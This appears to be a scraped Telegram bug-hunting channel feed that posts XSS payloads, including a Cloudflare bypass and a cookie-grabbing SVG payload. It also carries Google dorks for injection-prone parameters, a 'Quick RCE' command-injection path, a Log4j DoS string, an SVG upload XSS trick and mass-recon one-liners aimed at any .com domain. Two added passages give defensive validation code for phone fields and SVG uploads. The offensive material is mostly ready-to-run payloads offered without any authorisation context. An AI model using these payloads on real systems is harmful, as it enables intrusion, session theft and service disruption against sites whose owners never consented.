haxshadow
This channel is all about bug hunting, cybersec and ethical hacking related content.
any query msg me at @haxshadow_bot
Youtube:https://youtube.com/@haxshadow7
Bug Bounty Tips .pdf
18.3 MB
just wow
I uploaded this video: How to SSRF vulnerability in Next.js. Video link:
https://www.facebook.com/share/v/cRfk7SdqbJfCSUR3/
recon.txt
4.3 KB
Well, I haven't been posting YouTube videos for a while because I've been doing some case studies on Advanced Recon, and I have been less active online for some reason. Some of my subscribers have said that the file is called Recon.Text. I gave my Telegram to give the file to them.
XSS from javascript hidden params

assetfinder *.com | gau | egrep -v '(.css|.svg)' | while read -r url; do vars=$(curl -s "$url" | grep -Eo "var [a-zA-Z0-9]+" | sed -e 's,'var','"$url"?',g' -e 's/ //g' | grep -v '.js' | sed 's/.*/&=xss/g'); echo -e "\e[1;33m$url\n\e[1;32m$vars"; done
XSS in Phone Number Field? 👇

Recently I re-watched the NahamCon2022EU: RTFR (Read The Bleeping RFC) by securinti

One thing I was surprised to find out was that phone number fields can be vulnerable to XSS.

How is that possible?

According to the RFC it is possible to append an "optional parameter" to the number. Something like:

• 10203040;ext=+22
• 10203040;isub=12345
• 10203040;phone-context=example

This can lead to XSS if:

1. The library parses phone numbers according to RFC and accepts optional parameters such as "phone-context"

2. The phone number is reflected on the web interface without input validation or output encoding

So payloads like "10203040;phone-context=<script>alert(1)</script>" CAN be a valid phone number and trigger XSS
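Both conditions in the post above can be closed on the server side. The following is an added example, not code from the post or from the talk it cites: it accepts the optional parameters only with an allowlisted value alphabet, and HTML-encodes the value on output as a second layer. The function names, length limits and the value allowlist are assumptions made for the illustration.

```python
import html
import re

# Subscriber number: optional "+", digits, common visual separators.
NUMBER_RE = re.compile(r"\+?[0-9][0-9().\-]{1,30}")
# Parameter values: letters, digits, "+", "." and "-" only, so no markup
# characters can ride along. This allowlist is an assumption of the example.
VALUE_RE = re.compile(r"[A-Za-z0-9+.\-]{1,64}")
ALLOWED_PARAMS = {"ext", "isub", "phone-context"}


def parse_phone(raw: str):
    """Return (number, params) for an accepted value, else raise ValueError."""
    number, *params = raw.strip().split(";")
    if not NUMBER_RE.fullmatch(number):
        raise ValueError("invalid subscriber number")
    parsed = {}
    for param in params:
        name, sep, value = param.partition("=")
        name = name.lower()
        if name not in ALLOWED_PARAMS or name in parsed:
            raise ValueError(f"parameter not accepted: {name!r}")
        if not sep or not VALUE_RE.fullmatch(value):
            raise ValueError(f"invalid value for parameter {name!r}")
        parsed[name] = value
    return number, parsed


def is_accepted(raw: str) -> bool:
    """Input validation: True only if the whole value parses cleanly."""
    try:
        parse_phone(raw)
        return True
    except ValueError:
        return False


def render_phone(raw: str) -> str:
    """Output encoding: a value stored by a laxer parser is still inert."""
    return '<span class="phone">' + html.escape(raw, quote=True) + "</span>"


if __name__ == "__main__":
    # Constructed inputs: the three forms and the payload quoted in the post.
    for sample in ("10203040;ext=+22", "10203040;isub=12345",
                   "10203040;phone-context=example",
                   "10203040;phone-context=<script>alert(1)</script>"):
        print(is_accepted(sample), render_phone(sample))
```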
⚡️Google Dorks - Vulnerable Parameters ⚡️


⛔️XSS prone parameters:

inurl:q= | inurl:s= | inurl:search= | inurl:query= | inurl:keyword= | inurl:lang= inurl:& site:example[.]com

⛔️Open Redirect prone parameters

inurl:url= | inurl:return= | inurl:next= | inurl:redirect= | inurl:redir= | inurl:ret= | inurl:r2= | inurl:page= inurl:& inurl:http site:example[.]com

⛔️SQLi Prone Parameters

inurl:id= | inurl:pid= | inurl:category= | inurl:cat= | inurl:action= | inurl:sid= | inurl:dir= inurl:& site:example[.]com

⛔️SSRF Prone Parameters

inurl:http | inurl:url= | inurl:path= | inurl:dest= | inurl:html= | inurl:data= | inurl:domain= | inurl:page= inurl:& site:example[.]com

⛔️LFI Prone Parameters

inurl:include | inurl:dir | inurl:detail= | inurl:file= | inurl:folder= | inurl:inc= | inurl:locate= | inurl:doc= | inurl:conf= inurl:& site:example[.]com

⛔️RCE Prone Parameters

inurl:cmd | inurl:exec= | inurl:query= | inurl:code= | inurl:do= | inurl:run= | inurl:read= | inurl:ping= inurl:& site:example[.]com

🔆 Credit- Mike Takashi
Finding Hidden Parameter & Potential XSS with Arjun + KXSS

arjun -q -u target -oT arjun && cat arjun | awk -F'[?&]' '{baseUrl=$1; for(i=2; i<=NF; i++) {split($i, param, "="); print baseUrl "?" param[1] "="}}' | kxss
XSS Bypass Cloudflare payload :
<a href="j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t:console.log(1337)">XSS</a>
XSS payload without ()
<svg onload="{hello:window . name instanceof{[Symbol.hasInstance]:eval}}">
Quick RCE

🔥 Target/cgi-bin/dmt/reset.cgi?db_prefix=%26id%26
🔥 cgi-bin/dmt/reset.cgi?db_prefix=%26id%26
🔥 cgi-bin/reset.cgi?db_prefix=%26id%26
🚨🕷CVE-2017-7921🕷🚨

An Improper Authentication issue was discovered in Hikvision DS-2CD2xx2F-I Series V5.2.0 build 140721 to V5.4.0 build 160530, DS-2CD2xx0F-I Series V5.2.0 build 140721 to V5.4.0 Build 160401, DS-2CD2xx2FWD Series V5.3.1 build 150410 to V5.4.4 Build 161125, DS-2CD4x2xFWD Series V5.2.0 build 140721 to V5.4.0 Build 160414, DS-2CD4xx5 Series V5.2.0 build 140721 to V5.4.0 Build 160421, DS-2DFx Series V5.2.0 build 140805 to V5.4.5 Build 160928, and DS-2CD63xx Series V5.0.9 build 140305 to V5.3.5 Build 160106 devices. The improper authentication vulnerability occurs when an application does not adequately or correctly authenticate users. This may allow a malicious user to escalate his or her privileges on the system and gain access to sensitive information.
The proof of concept payload for (CVE-2021-45105) Log4j 2.16 vulnerability DoS
User-Agent: ${${::-${::-$${::-j}}}}
Collect subdomains from Google Tag Manager ID using this one-liner! 🕵️‍♂️💻

curl -s "target" | grep -oP '"key","[a-zA-Z0-9.-]+\.[a-z]{2,}"' | awk -F'"' '{print $4}'
SQLi and Xss on Same program
Payload: <svg onload=prompt%26%230000000040document.cookie)>
// Katana one Liners [Try for bounty programs]
katana -u "target" -d 5 -o urls2.txt -c 50 && waybackurls "target" | anew urls2.txt && dirsearch -L urls2.txt -e php,html,js -t 50
ok
I wanted to create a free blogger website. You will get many things for free on this site. Now I tested what I saw. Everyone can visit: https://shadowcyber51.blogspot.com/2024/10/test.html?m=1
Neat trick for SVG file upload exploits. Add a foreignObject tag and include almost any working XSS payload in the SVG image file. Helpful for bypassing CSP or bypassing servers that strip strings.

Many file uploads allow SVGs and are prone to tampering.

<svg width="600" height="400" xmlns="http://www.w3.org/2000/svg" xmlns:xhtml="http://www.w3.org/1999/xhtml">
  <foreignObject width="100%" height="100%">
    <body xmlns="http://www.w3.org/1999/xhtml">
      <iframe src='javascript:confirm(10)'></iframe>
    </body>
  </foreignObject>
</svg>
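On the receiving side, string stripping misses this because the markup is ordinary, well-formed XML. An upload check that parses the file and allowlists elements catches it. The following is an added example, not code from the post: the function name, the element allowlist and the sample files are constructed for the illustration.

```python
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
# Drawing elements only; foreignObject, script, a, image etc. are left out.
ALLOWED_TAGS = {"svg", "g", "path", "rect", "circle", "ellipse", "line",
                "polyline", "polygon", "text", "title", "desc", "defs",
                "linearGradient", "radialGradient", "stop", "use"}


def svg_upload_problems(data: bytes) -> list:
    """Return a list of reasons to reject the upload; empty means accepted."""
    upper = data.upper()
    # Refuse DTDs before parsing so entity definitions are never expanded.
    if b"<!DOCTYPE" in upper or b"<!ENTITY" in upper:
        return ["DOCTYPE/ENTITY declarations are not accepted"]
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]
    problems = []
    for el in root.iter():
        ns, _, local = el.tag.rpartition("}")
        # Every element must be in the SVG namespace and on the allowlist.
        if ns != "{" + SVG_NS or local not in ALLOWED_TAGS:
            problems.append(f"element not allowed: {local}")
        for name, value in el.attrib.items():
            attr = name.rpartition("}")[2].lower()
            if attr.startswith("on"):
                problems.append(f"event handler attribute: {attr}")
            elif attr == "href" and not value.strip().startswith("#"):
                problems.append(f"non-local href on {local}")
    return problems


# Constructed samples: the structure from the post, and a plain drawing.
FOREIGN_OBJECT_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg">
  <foreignObject width="100%" height="100%">
    <body xmlns="http://www.w3.org/1999/xhtml">
      <iframe src="javascript:confirm(10)"></iframe>
    </body>
  </foreignObject>
</svg>"""
PLAIN_SVG = (b'<svg xmlns="http://www.w3.org/2000/svg" width="10" height="10">'
             b'<rect width="10" height="10"/></svg>')

if __name__ == "__main__":
    print(svg_upload_problems(FOREIGN_OBJECT_SVG))
    print(svg_upload_problems(PLAIN_SVG))
```

Validation works alongside, not instead of, serving user uploads with `Content-Disposition: attachment` or from a separate origin, so a file that slips through is not rendered in the application's own origin.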
Those who are interested in Android phone hacking can read this article
https://shorturl.at/x8jNs